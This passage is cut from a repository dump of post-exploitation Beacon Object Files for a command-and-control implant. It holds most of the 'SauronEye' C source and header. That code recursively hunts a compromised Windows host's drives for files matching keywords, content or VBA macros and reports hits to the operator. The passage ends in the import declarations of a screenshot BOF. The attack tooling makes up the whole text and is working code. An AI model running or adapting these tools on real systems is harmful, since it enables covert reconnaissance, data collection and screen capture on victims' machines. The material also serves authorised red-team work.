            size_t keywordLen = MSVCRT$strlen(kw);
            if (keywordLen == 0) continue;
            char* lowerKeyword = lowerKeywords[i];
            int matchCount = 0;
            const char* match = buffer;
            while ((match = MSVCRT$strstr(match, lowerKeyword)) != NULL && matchCount < MAX_MATCHES_PER_FILE) {
                BOOL isWordStart = (match == buffer ||
                    (match > buffer && (match[-1] < 'a' || match[-1] > 'z')));
                BOOL isWordEnd = (match + keywordLen >= buffer + bytesRead ||
                    (match[keywordLen] < 'a' || match[keywordLen] > 'z'));
                if (isWordStart && isWordEnd) {
                    const char* matchEnd = match + keywordLen;
                    if (OutputSearchResult(filepath, filetime, match, matchEnd, buffer, originalBuffer, bytesRead, opts, seenOffsets, &seenOffsetsCount, seenOffsetsCapacity)) {
                        matchCount++;
                        totalMatches++;
                    }
                    match += keywordLen;
                } else {
                    match++;
                }
            }
            if (matchCount >= MAX_MATCHES_PER_FILE) {
                BeaconPrintf(CALLBACK_OUTPUT, "[!] File %s: Reached maximum matches limit (%d) for keyword\n", filepath, MAX_MATCHES_PER_FILE);
            }
        }
    }
    for (int i = 0; i < opts->keyword_count; i++) MSVCRT$free(lowerKeywords[i]);
    MSVCRT$free(lowerKeywords);
    MSVCRT$free(buffer);
    MSVCRT$free(originalBuffer);
    if (seenOffsets) MSVCRT$free(seenOffsets);
    return totalMatches;
}
void SearchDirectory(const char* dir_path, SearchOptions* opts) {
    WIN32_FIND_DATAA findData;
    HANDLE hFind;
    char search_path[MAX_PATH_LENGTH + 4];
    char file_path[MAX_PATH_LENGTH];
    if (opts->search_contents) {
        if (opts->result_count >= MAX_RESULTS) {
            return;
        }
    } else {
        if (opts->file_count >= MAX_RESULTS) {
            return;
        }
    }
    if (MSVCRT$strlen(dir_path) > MAX_PATH_LENGTH - 3) {
        return;
    }
    MSVCRT$_snprintf(search_path, sizeof(search_path), "%s\\*", dir_path);
    hFind = KERNEL32$FindFirstFileA(search_path, &findData);
    if (hFind == INVALID_HANDLE_VALUE) {
        DWORD error = KERNEL32$GetLastError();
        if (error != ERROR_ACCESS_DENIED && error != ERROR_FILE_NOT_FOUND && error != ERROR_PATH_NOT_FOUND) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Cannot access directory %s (Error: %lu)\n", dir_path, error);
        }
        return;
    }
    do {
        if (opts->search_contents) {
            if (opts->result_count >= MAX_RESULTS) {
                break;
            }
        } else {
            if (opts->file_count >= MAX_RESULTS) {
                break;
            }
        }
        if (MSVCRT$strcmp(findData.cFileName, ".") == 0 ||
            MSVCRT$strcmp(findData.cFileName, "..") == 0) {
            continue;
        }
        if (MSVCRT$strlen(dir_path) + MSVCRT$strlen(findData.cFileName) + 2 > MAX_PATH_LENGTH) {
            continue;
        }
        MSVCRT$_snprintf(file_path, sizeof(file_path), "%s\\%s", dir_path, findData.cFileName);
        file_path[MAX_PATH_LENGTH - 1] = '\0';
        if (findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
            if (IsFolderValid(file_path, opts)) {
                SearchDirectory(file_path, opts);
            }
            continue;
        }
        if (!MatchesFiletype(file_path, opts)) {
            continue;
        }
        ULONGLONG file_size = ((ULONGLONG)findData.nFileSizeHigh << 32) | findData.nFileSizeLow;
        ULONGLONG file_size_kb = file_size / 1024;
        if (file_size_kb > opts->max_file_size_kb && opts->search_contents) {
            continue;
        }
        if (!MatchesDateFilter(&findData.ftLastWriteTime, opts)) {
            continue;
        }
        BOOL nameMatch = (opts->keyword_count == 0) ? TRUE : MatchesKeyword(findData.cFileName, opts);
        if (opts->check_for_macro) {
            if (!CheckForVBAMacrosStrict(file_path, FALSE)) {
                continue;
            }
        }
        int contentMatches = 0;
        if (opts->search_contents) {
            contentMatches = SearchFileContents(file_path, &findData.ftLastWriteTime, opts);
        }
        if (contentMatches > 0) {
            opts->result_count += contentMatches;
            opts->file_count++;
        } else if (nameMatch && !opts->search_contents) {
            if (IsPathAlreadySeen(file_path, opts)) {
                continue;
            }
            if (opts->file_count >= MAX_RESULTS) {
                break;
            }
            NormalizePath(file_path);
            size_t pathLen = MSVCRT$strlen(file_path);
            if (pathLen < MAX_PATH_LENGTH) {
                file_path[pathLen] = '\0';
            } else {
                file_path[MAX_PATH_LENGTH - 1] = '\0';
            }
            char dateStr[35] = {0};
            if (opts->show_date) {
                FormatFileDate(&findData.ftCreationTime, &findData.ftLastWriteTime, dateStr, sizeof(dateStr));
            }
            if (opts->show_date && dateStr[0]) {
                BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %s %s\n", dateStr, file_path);
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %s\n", file_path);
            }
            AddPathToSeen(file_path, opts);
            opts->file_count++;
        }
    } while (KERNEL32$FindNextFileA(hFind, &findData));
    KERNEL32$FindClose(hFind);
}
void TrimQuotes(char* str) {
    if (!str || !*str) return;
    char* start = str;
    while (*start == '\'' || *start == '\"') start++;
    if (!*start) { *str = '\0'; return; }
    char* end = start;
    while (*end) end++;
    while (end > start && (end[-1] == '\'' || end[-1] == '\"')) end--;
    if (start != str) {
        size_t len = end - start;
        MSVCRT$memcpy(str, start, len);
        str[len] = '\0';
    } else {
        *end = '\0';
    }
}
void NormalizePath(char* path) {
    if (!path || !*path) return;
    char* write = path;
    const char* read = path;
    while (*read) {
        if (*read == '\\' && read[1] == '\\') {
            *write++ = '\\';
            read += 2;
        } else {
            *write++ = *read++;
        }
    }
    *write = '\0';
}
void GetCanonicalPath(const char* filepath, char* canonical, size_t canonicalSize) {
    if (!filepath || !canonical || canonicalSize == 0) {
        if (canonical && canonicalSize > 0) canonical[0] = '\0';
        return;
    }
    DWORD len = KERNEL32$GetFullPathNameA(filepath, (DWORD)canonicalSize, canonical, NULL);
    if (len == 0 || len >= canonicalSize) {
        size_t pathLen = MSVCRT$strlen(filepath);
        if (pathLen >= canonicalSize) pathLen = canonicalSize - 1;
        MSVCRT$memcpy(canonical, filepath, pathLen);
        canonical[pathLen] = '\0';
    }
    NormalizePath(canonical);
    BOOL is_all_users = FALSE;
    size_t prefix_len = 0;
    if (MSVCRT$_strnicmp(canonical, "C:\\Users\\All Users", 19) == 0) {
        if (canonical[19] == '\\' || canonical[19] == '\0') {
            is_all_users = TRUE;
            prefix_len = 20;
            if (canonical[19] == '\0') prefix_len = 19;
        }
    }
    else if (MSVCRT$strncmp(canonical, "C:\\Users\\", 10) == 0) {
        const unsigned char* check = (const unsigned char*)(canonical + 10);
        const unsigned char vse_pattern[] = {0xD0, 0x92, 0xD1, 0x81, 0xD0, 0xB5, 0x20, 0xD0, 0xBF, 0xD0, 0xBE, 0xD0, 0xBB, 0xD1, 0x8C, 0xD0, 0xB7, 0xD0, 0xBE, 0xD0, 0xB2, 0xD0, 0xB0, 0xD1, 0x82, 0xD0, 0xB5, 0xD0, 0xBB, 0xD0, 0xB8};
        if (MSVCRT$memcmp(check, vse_pattern, sizeof(vse_pattern)) == 0) {
            if (canonical[10 + sizeof(vse_pattern)] == '\\' || canonical[10 + sizeof(vse_pattern)] == '\0') {
                is_all_users = TRUE;
                prefix_len = 10 + sizeof(vse_pattern) + 1;
                if (canonical[10 + sizeof(vse_pattern)] == '\0') prefix_len = 10 + sizeof(vse_pattern);
            }
        }
    }
    if (is_all_users && prefix_len > 0) {
        size_t remaining_len = MSVCRT$strlen(canonical + prefix_len);
        if (remaining_len + 16 < canonicalSize) {
            char temp[MAX_PATH_LENGTH];
            MSVCRT$memcpy(temp, "C:\\ProgramData\\", 16);
            if (remaining_len > 0) {
                MSVCRT$memcpy(temp + 15, canonical + prefix_len, remaining_len + 1);
            } else {
                temp[15] = '\0';
            }
            MSVCRT$memcpy(canonical, temp, MSVCRT$strlen(temp) + 1);
        }
    }
    for (char* p = canonical; *p; p++) {
        if ((unsigned char)*p < 128) {
            *p = (char)MSVCRT$tolower((unsigned char)*p);
        }
    }
}
BOOL IsPathAlreadySeen(const char* filepath, SearchOptions* opts) {
    if (!filepath || !opts) return FALSE;
    if (!opts->seen_paths) {
        opts->seen_paths_capacity = 256;
        opts->seen_paths = (char**)MSVCRT$malloc(sizeof(char*) * opts->seen_paths_capacity);
        if (!opts->seen_paths) return FALSE;
        opts->seen_paths_count = 0;
    }
    char canonical[MAX_PATH_LENGTH];
    GetCanonicalPath(filepath, canonical, sizeof(canonical));
    for (int i = 0; i < opts->seen_paths_count; i++) {
        if (opts->seen_paths[i] && MSVCRT$strcmp(opts->seen_paths[i], canonical) == 0) {
            return TRUE;
        }
    }
    return FALSE;
}
void AddPathToSeen(const char* filepath, SearchOptions* opts) {
    if (!filepath || !opts) return;
    if (!opts->seen_paths) {
        opts->seen_paths_capacity = 256;
        opts->seen_paths = (char**)MSVCRT$malloc(sizeof(char*) * opts->seen_paths_capacity);
        if (!opts->seen_paths) return;
        opts->seen_paths_count = 0;
    }
    if (opts->seen_paths_count >= opts->seen_paths_capacity) {
        int new_capacity = opts->seen_paths_capacity * 2;
        char** new_array = (char**)MSVCRT$realloc(opts->seen_paths, sizeof(char*) * new_capacity);
        if (!new_array) return;
        opts->seen_paths = new_array;
        opts->seen_paths_capacity = new_capacity;
    }
    char canonical[MAX_PATH_LENGTH];
    GetCanonicalPath(filepath, canonical, sizeof(canonical));
    size_t len = MSVCRT$strlen(canonical);
    opts->seen_paths[opts->seen_paths_count] = (char*)MSVCRT$malloc(len + 1);
    if (opts->seen_paths[opts->seen_paths_count]) {
        MSVCRT$memcpy(opts->seen_paths[opts->seen_paths_count], canonical, len + 1);
        opts->seen_paths_count++;
    }
}
void ParseCSVList(char* str, char*** list, int* count) {
    if (!str || !*str) { *list = NULL; *count = 0; return; }
    int item_count = 1;
    for (int i = 0; str[i]; i++) if (str[i] == ',') item_count++;
    *list = (char**)MSVCRT$malloc(sizeof(char*) * item_count);
    *count = item_count;
    if (!*list) { *count = 0; return; }
    size_t len = MSVCRT$strlen(str);
    char* str_copy = (char*)MSVCRT$malloc(len + 1);
    if (!str_copy) { MSVCRT$free(*list); *list = NULL; *count = 0; return; }
    MSVCRT$memcpy(str_copy, str, len + 1);
    char* token = MSVCRT$strtok(str_copy, ",");
    int idx = 0;
    while (token && idx < item_count) {
        while (*token == ' ') token++;
        char* end = token + MSVCRT$strlen(token) - 1;
        while (end > token && *end == ' ') *end-- = '\0';
        TrimQuotes(token);
        NormalizePath(token);
        size_t token_len = MSVCRT$strlen(token);
        (*list)[idx] = (char*)MSVCRT$malloc(token_len + 1);
        if ((*list)[idx]) {
            MSVCRT$memcpy((*list)[idx], token, token_len + 1);
            idx++;
        }
        token = MSVCRT$strtok(NULL, ",");
    }
    *count = idx;
    MSVCRT$free(str_copy);
}
static char* AllocString(const char* src) {
    if (!src) return NULL;
    size_t len = MSVCRT$strlen(src);
    char* dst = (char*)MSVCRT$malloc(len + 1);
    if (dst) {
        MSVCRT$memcpy(dst, src, len + 1);
    }
    return dst;
}
BOOL ParseDate(const char* date_str, SYSTEMTIME* st) {
    if (MSVCRT$strlen(date_str) != 10 || date_str[2] != '.' || date_str[5] != '.') return FALSE;
    st->wDayOfWeek = st->wHour = st->wMinute = st->wSecond = st->wMilliseconds = 0;
    st->wDay = (WORD)((date_str[0] - '0') * 10 + (date_str[1] - '0'));
    st->wMonth = (WORD)((date_str[3] - '0') * 10 + (date_str[4] - '0'));
    st->wYear = (WORD)((date_str[6] - '0') * 1000 + (date_str[7] - '0') * 100 + (date_str[8] - '0') * 10 + (date_str[9] - '0'));
    return (st->wYear >= 1900 && st->wYear <= 9999 && st->wMonth >= 1 && st->wMonth <= 12 && st->wDay >= 1 && st->wDay <= 31);
}
void go(char* args, int len) {
    datap parser;
    BeaconDataParse(&parser, args, len);
    char* raw_cmdline = BeaconDataExtract(&parser, NULL);
    SearchOptions opts = {0};
    opts.max_file_size_kb = 1024;
    opts.system_dirs = FALSE;
    opts.search_contents = FALSE;
    opts.check_for_macro = FALSE;
    opts.has_date_filter = FALSE;
    opts.show_date = FALSE;
    opts.result_count = 0;
    opts.file_count = 0;
    opts.wildcard_max_attempts = 0;
    opts.wildcard_max_size = 0;
    opts.wildcard_max_backtrack = 0;
    opts.seen_paths = NULL;
    opts.seen_paths_count = 0;
    opts.seen_paths_capacity = 0;
    if (raw_cmdline && *raw_cmdline) {
        const char* p = raw_cmdline;
        while (*p) {
            if (*p == '-' && p[1]) {
                const char valid_flags[] = "-d-f-k-c-m-s-b-a-v-D-W-S-B";
                BOOL valid = FALSE;
                for (int i = 0; i < (int)sizeof(valid_flags) - 1; i += 2) {
                    if (p[0] == valid_flags[i] && p[1] == valid_flags[i+1]) { valid = TRUE; break; }
                }
                if (!valid) {
                    char flag[3] = {p[0], p[1], '\0'};
                    BeaconPrintf(CALLBACK_ERROR, "Invalid flag: %s\n", flag);
                    return;
                }
                while (*p && *p != ' ' && *p != '\t') p++;
            } else p++;
        }
    }
    char* directories_str = BeaconDataExtract(&parser, NULL);
    char* filetypes_str = BeaconDataExtract(&parser, NULL);
    char* keywords_str = BeaconDataExtract(&parser, NULL);
    int search_contents_int = BeaconDataInt(&parser);
    int max_filesize_int = BeaconDataInt(&parser);
    int system_dirs_int = BeaconDataInt(&parser);
    char* before_date_str = BeaconDataExtract(&parser, NULL);
    char* after_date_str = BeaconDataExtract(&parser, NULL);
    int check_macro_int = BeaconDataInt(&parser);
    int show_date_int = BeaconDataInt(&parser);
    int wildcard_attempts_int = BeaconDataInt(&parser);
    int wildcard_size_int = BeaconDataInt(&parser);
    int wildcard_backtrack_int = BeaconDataInt(&parser);
    opts.search_contents = (search_contents_int != 0);
    opts.system_dirs = (system_dirs_int != 0);
    opts.check_for_macro = (check_macro_int != 0);
    opts.show_date = (show_date_int != 0);
    if (max_filesize_int > 0) opts.max_file_size_kb = (ULONGLONG)max_filesize_int;
    if (wildcard_attempts_int > 0) opts.wildcard_max_attempts = wildcard_attempts_int;
    if (wildcard_size_int > 0) opts.wildcard_max_size = (ULONGLONG)wildcard_size_int * 1024;
    if (wildcard_backtrack_int > 0) opts.wildcard_max_backtrack = wildcard_backtrack_int;
    if (directories_str && MSVCRT$strlen(directories_str) > 0) {
        ParseCSVList(directories_str, &opts.directories, &opts.dir_count);
    } else {
        opts.dir_count = 1;
        opts.directories = (char**)MSVCRT$malloc(sizeof(char*) * 1);
        if (opts.directories) {
            opts.directories[0] = AllocString("C:\\");
        }
    }
    if (filetypes_str && MSVCRT$strlen(filetypes_str) > 0) {
        ParseCSVList(filetypes_str, &opts.filetypes, &opts.filetype_count);
    } else {
        if (opts.check_for_macro) {
            const char* default_types[] = {".doc", ".xls", ".docm", ".xlsm"};
            opts.filetype_count = 4;
            opts.filetypes = (char**)MSVCRT$malloc(sizeof(char*) * 4);
            if (opts.filetypes) {
                for (int i = 0; i < 4; i++) {
                    opts.filetypes[i] = AllocString(default_types[i]);
                }
            }
        } else {
            const char* default_types[] = {".txt", ".docx"};
            opts.filetype_count = 2;
            opts.filetypes = (char**)MSVCRT$malloc(sizeof(char*) * 2);
            if (opts.filetypes) {
                for (int i = 0; i < 2; i++) {
                    opts.filetypes[i] = AllocString(default_types[i]);
                }
            }
        }
    }
    if (keywords_str && MSVCRT$strlen(keywords_str) > 0) {
        ParseCSVList(keywords_str, &opts.keywords, &opts.keyword_count);
    } else {
        opts.keyword_count = 0;
        opts.keywords = NULL;
    }
    if (before_date_str && *before_date_str) {
        if (ParseDate(before_date_str, &opts.before_date)) opts.has_date_filter = TRUE;
        else BeaconPrintf(CALLBACK_ERROR, "[-] Invalid before date format: %s\n", before_date_str);
    }
    if (after_date_str && *after_date_str) {
        if (ParseDate(after_date_str, &opts.after_date)) opts.has_date_filter = TRUE;
        else BeaconPrintf(CALLBACK_ERROR, "[-] Invalid after date format: %s\n", after_date_str);
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Starting SauronEye search...\n[*] Directories: ");
    for (int i = 0; i < opts.dir_count; i++) BeaconPrintf(CALLBACK_OUTPUT, "%s ", opts.directories[i]);
    BeaconPrintf(CALLBACK_OUTPUT, "\n");
    for (int i = 0; i < opts.dir_count; i++) {
        if (opts.search_contents) {
            if (opts.result_count >= MAX_RESULTS) {
                BeaconPrintf(CALLBACK_OUTPUT, "[!] Reached maximum results limit (%d)\n", MAX_RESULTS);
                break;
            }
        } else {
            if (opts.file_count >= MAX_RESULTS) {
                BeaconPrintf(CALLBACK_OUTPUT, "[!] Reached maximum files limit (%d)\n", MAX_RESULTS);
                break;
            }
        }
        if (SHLWAPI$PathFileExistsA(opts.directories[i])) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Searching in: %s\n", opts.directories[i]);
            SearchDirectory(opts.directories[i], &opts);
        } else {
            BeaconPrintf(CALLBACK_ERROR, "[-] Directory does not exist: %s\n", opts.directories[i]);
        }
    }
    if (opts.search_contents && opts.result_count > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Search completed. Found %d results in %d files.\n", opts.result_count, opts.file_count);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Search completed. Found %d files.\n", opts.file_count);
    }
    if (opts.seen_paths) {
        for (int i = 0; i < opts.seen_paths_count; i++) {
            if (opts.seen_paths[i]) {
                MSVCRT$free(opts.seen_paths[i]);
            }
        }
        MSVCRT$free(opts.seen_paths);
    }
}

================================================
FILE: Postex-BOF/SauronEyeBOF/sauroneye.h
================================================
#ifndef SAURONEYE_H
#define SAURONEYE_H

#include <windows.h>
#include <shlwapi.h>

#pragma comment(lib, "Shlwapi.lib")

// API declarations
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileAttributesW(LPCWSTR lpFileName);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$FindClose(HANDLE hFindFile);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$FindFirstFileW(LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$FindNextFileW(HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$FindFirstFileA(LPCSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$FindNextFileA(HANDLE hFindFile, LPWIN32_FIND_DATAA lpFindFileData);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileAttributesA(LPCSTR lpFileName);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileAttributesExA(LPCSTR lpFileName, GET_FILEEX_INFO_LEVELS fInfoLevelId, LPVOID lpFileInformation);
#ifndef GetFileExInfoStandard
#define GetFileExInfoStandard 0
#endif
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$FileTimeToSystemTime(const FILETIME *lpFileTime, LPSYSTEMTIME lpSystemTime);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID);
DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath);
DECLSPEC_IMPORT int WINAPI MSVCRT$sprintf(char *str, const char *format, ...);
DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(char *str, size_t size, const char *format, ...);
DECLSPEC_IMPORT void* WINAPI MSVCRT$malloc(size_t size);
DECLSPEC_IMPORT void* WINAPI MSVCRT$realloc(void *ptr, size_t size);
DECLSPEC_IMPORT void WINAPI MSVCRT$free(void *ptr);
DECLSPEC_IMPORT int WINAPI MSVCRT$strcmp(const char *s1, const char *s2);
DECLSPEC_IMPORT int WINAPI MSVCRT$strncmp(const char *s1, const char *s2, size_t n);
DECLSPEC_IMPORT char* WINAPI MSVCRT$strstr(const char *haystack, const char *needle);
DECLSPEC_IMPORT char* WINAPI MSVCRT$strrchr(const char *s, int c);
DECLSPEC_IMPORT char* WINAPI MSVCRT$strtok(char *str, const char *delim);
DECLSPEC_IMPORT size_t WINAPI MSVCRT$strlen(const char *s);
DECLSPEC_IMPORT int WINAPI MSVCRT$tolower(int c);
DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char *s1, const char *s2);
DECLSPEC_IMPORT int __cdecl MSVCRT$_strnicmp(const char *s1, const char *s2, size_t n);
DECLSPEC_IMPORT void* WINAPI MSVCRT$memcpy(void *dest, const void *src, size_t n);
DECLSPEC_IMPORT int WINAPI MSVCRT$memcmp(const void *s1, const void *s2, size_t n);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR lpModuleName);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE hModule, LPCSTR lpProcName);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFullPathNameA(LPCSTR lpFileName, DWORD nBufferLength, LPSTR lpBuffer, LPSTR* lpFilePart);

// NT Native API types
typedef long NTSTATUS;
typedef struct _IO_STATUS_BLOCK {
    union {
        NTSTATUS Status;
        void*    Pointer;
    } DUMMYUNIONNAME;
    unsigned long long Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef enum _FILE_INFORMATION_CLASS {
    FileDirectoryInformation = 1,
    FileFullDirectoryInformation,
    FileBothDirectoryInformation,
    FileBasicInformation,
    FileStandardInformation = 5,
} FILE_INFORMATION_CLASS;

typedef struct _FILE_STANDARD_INFORMATION {
    LARGE_INTEGER AllocationSize;
    LARGE_INTEGER EndOfFile;
    unsigned long NumberOfLinks;
    unsigned char DeletePending;
    unsigned char Directory;
} FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION;

DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtQueryInformationFile(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass);
DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtReadFile(HANDLE FileHandle, HANDLE Event, PVOID ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG Key);

// OLE32 constants
#ifndef S_OK
#define S_OK 0x00000000
#endif

#ifndef STGM_READ
#define STGM_READ 0x00000000L
#endif

#ifndef STGM_SHARE_DENY_WRITE
#define STGM_SHARE_DENY_WRITE 0x00000020L
#endif

// Dynamic OLE32 function pointer types
typedef HRESULT (WINAPI *PFN_StgIsStorageFile)(LPCWSTR);
typedef HRESULT (WINAPI *PFN_StgOpenStorage)(LPCWSTR, void*, DWORD, void*, DWORD, void**);

// Constants
#define OOXML_SCAN_WINDOW (256 * 1024) // 256KB head/tail scan
#define MAX_RESULTS 1000
#define MAX_PATH_LENGTH 260
#define MAX_CONTENT_BUFFER_SIZE (10 * 1024 * 1024)
#define CONTEXT_BUFFER_SIZE 50

// Wildcard search performance limits (adjustable)
#define WILDCARD_MAX_MATCH_ATTEMPTS 1000        // Maximum number of pattern matching attempts
#define WILDCARD_MAX_SEARCH_SIZE (200 * 1024)  // Maximum search area for large files (200KB)
#define WILDCARD_MAX_BACKTRACK 1000             // Maximum backtracking operations to prevent infinite loops
#define MAX_MATCHES_PER_FILE 100                // Maximum matches per file to prevent excessive output

// Search options structure
typedef struct {
    char** directories;
    int dir_count;
    char** filetypes;
    int filetype_count;
    char** keywords;
    int keyword_count;
    BOOL search_contents;
    BOOL system_dirs;
    ULONGLONG max_file_size_kb;
    SYSTEMTIME before_date;
    SYSTEMTIME after_date;
    BOOL check_for_macro;  // -v: OOXML macro detection
    BOOL has_date_filter;
    BOOL show_date;        // -D: Show file modification date in output
    int result_count;      // Total number of matches found
    int file_count;        // Total number of files with matches
    // Wildcard search performance tuning (0 = use default)
    int wildcard_max_attempts;      // -W: Maximum pattern matching attempts (default: WILDCARD_MAX_MATCH_ATTEMPTS)
    ULONGLONG wildcard_max_size;    // -S: Maximum search area in bytes (default: WILDCARD_MAX_SEARCH_SIZE)
    int wildcard_max_backtrack;     // -B: Maximum backtracking operations (default: WILDCARD_MAX_BACKTRACK)
    // Path deduplication
    char** seen_paths;      // Array of canonical paths already output
    int seen_paths_count;   // Number of paths in seen_paths array
    int seen_paths_capacity; // Capacity of seen_paths array
} SearchOptions;

// VBA macro detection
BOOL CheckForVBAMacrosStrict(const char* filepath, BOOL use_ole);

// Matching functions
BOOL MatchWildcard(const char* pattern, const char* str);
BOOL MatchesKeyword(const char* filename, SearchOptions* opts);
BOOL MatchesFiletype(const char* filepath, SearchOptions* opts);
BOOL IsFolderValid(const char* path, SearchOptions* opts);
BOOL MatchesDateFilter(const FILETIME* filetime, SearchOptions* opts);

// Search functions
int SearchFileContents(const char* filepath, const FILETIME* filetime, SearchOptions* opts);  // Returns number of matches found
void SearchDirectory(const char* dir_path, SearchOptions* opts);

// Utility functions
void TrimQuotes(char* str);
void NormalizePath(char* path);
void ParseCSVList(char* str, char*** list, int* count);
BOOL ParseDate(const char* date_str, SYSTEMTIME* st);
BOOL IsPathAlreadySeen(const char* filepath, SearchOptions* opts);
void AddPathToSeen(const char* filepath, SearchOptions* opts);
void GetCanonicalPath(const char* filepath, char* canonical, size_t canonicalSize);

#endif // SAURONEYE_H


================================================
FILE: Postex-BOF/ScreenshotBOF/entry.c
================================================
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <gdiplus.h>
#include "adaptix.h"

#pragma comment(lib, "User32.lib")
#pragma comment(lib, "gdiplus.lib")

DECLSPEC_IMPORT BOOL    WINAPI GDI32$DeleteDC(HDC hdc);
DECLSPEC_IMPORT HDC     WINAPI USER32$GetDC(HWND hWnd);
DECLSPEC_IMPORT int     WINAPI USER32$ReleaseDC(HWND hWnd, HDC hdc);
DECLSPEC_IMPORT HDC     WINAPI GDI32$CreateCompatibleDC(HDC hdc);
DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int nWidth, int nHeight);
DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ hgdiobj);
DECLSPEC_IMPORT BOOL    WINAPI USER32$PrintWindow(HWND hwnd, HDC hdcBlt, UINT nFlags);
DECLSPEC_IMPORT BOOL    WINAPI GDI32$BitBlt(HDC hdcDest, int nXDest, int nYDest, int nWidth, int nHeight, HDC hdcSrc, int nXSrc, int nYSrc, DWORD dwRop);
DECLSPEC_IMPORT BOOL    WINAPI USER32$ShowWindow(HWND hWnd, int nCmdShow);
DECLSPEC_IMPORT LONG    WINAPI USER32$SetWindowLongA(HWND hWnd, int nIndex, LONG dwNewLong);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CreateStreamOnHGlobal(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM *ppstm);
DECLSPEC_IMPORT BOOL    WINAPI USER32$SetLayeredWindowAttributes(HWND hWnd, COLORREF crKey, BYTE bAlpha, DWORD dwFlags);
DECLSPEC_IMPORT BOOL    WINAPI USER32$UpdateWindow(HWND hWnd);
DECLSPEC_IMPORT VOID    WINAPI KERNEL32$Sleep(DWORD dwMilliseconds);
DECLSPEC_IMPORT BOOL    WINAPI USER32$GetWindowRect(HWND hWnd, LPRECT lpRect);
DECLSPEC_IMPORT BOOL    WINAPI USER32$GetWindowPlacement(HWND hWnd, WINDOWPLACEMENT* lpwndpl);
DECLSPEC_IMPORT DWORD   WINAPI USER32$GetWindowThreadProcessId(HWND hWnd, LPDWORD lpdwProcessId);
DECLSPEC_IMPORT BOOL    WINAPI USER32$EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam);
DECLSPEC_IMPORT int     WINAPI USER32$GetSystemMetrics(int nIndex);
DECLSPEC_IMPORT BOOL    WINAPI USER32$SetWindowPos(HWND hWnd, HWND hWndInsertAfter, int X, int Y, int cx, int cy, UINT uFlags);
DECLSPEC_IMPORT BOOL    WINAPI USER32$IsWindowVisible(HWND hWnd);
DECLSPEC_IMPORT LONG    WINAPI USER32$GetWindowLongA(HWND hWnd, int nIndex);
DECLSPEC_IMPORT BOOL    WINAPI GDI32$DeleteObject(HGDIOBJ hObject);
DECLSPEC_IMPORT BOOL    WINAPI USER32$SetProcessDPIAware();
WINBASEAPI DWORD        WINAPI KERNEL32$GetLastError(VOID);

DECLSPEC_IMPORT WINBASEAPI void* MSVCRT$malloc(size_t size);
DECLSPEC_IMPORT WINBASEAPI void  MSVCRT$free(void *_Memory);

DECLSPEC_IMPORT GpStatus WINAPI GDIPLUS$GdiplusStartup(ULONG_PTR* pToken, const GdiplusStartupInput* pInput, GdiplusStartupOutput* pOutput);
DECLSPEC_IMPORT VOID   WINAPI GDIPLUS$GdiplusShutdown(ULONG_PTR token);
DECLSPEC_IMPORT GpStatus WINAPI GDIPLUS$GdipCreateBitmapFromHBITMAP(HBITMAP hBitmap, HPALETTE hPalette, GpBitmap** ppBitmap);
